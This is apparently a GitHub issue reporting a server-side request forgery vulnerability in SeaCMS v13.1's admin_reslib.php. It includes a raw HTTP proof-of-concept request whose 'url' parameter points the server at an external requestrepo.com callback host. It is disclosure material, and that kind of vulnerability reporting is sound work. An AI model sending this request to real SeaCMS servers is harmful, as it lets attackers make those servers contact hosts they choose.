seacms-net / CMS

海洋cms程序发布
https://www.seacms.net
379 stars 25 forks source link

SeaCMS v13.1 Server-Side Request Forgery Vulnerability #23

Open p2zhhh opened 1 month ago

p2zhhh commented 1 month ago

Analysis

In [random]/admin_reslib.php

图片1 图片2

POC

`GET /h41jj/admin_reslib.php?action=day&rid=cdd&pg=5&url=http://mecszh1b.requestrepo.com&backurl=admin_reslib.php HTTP/1.1

Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1/h41jj/admin_reslib.php Cookie: uUp_qkey=FK72BeVF3%2FZnoHE3C%2FS%2B%2F5TLyrJh3JFC; PHPSESSID=i5pv351qtbcmg4p9piqs2cvd2s; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i`

The parameter url is the DNS server address

图片3
lem0n817 commented 4 weeks ago

6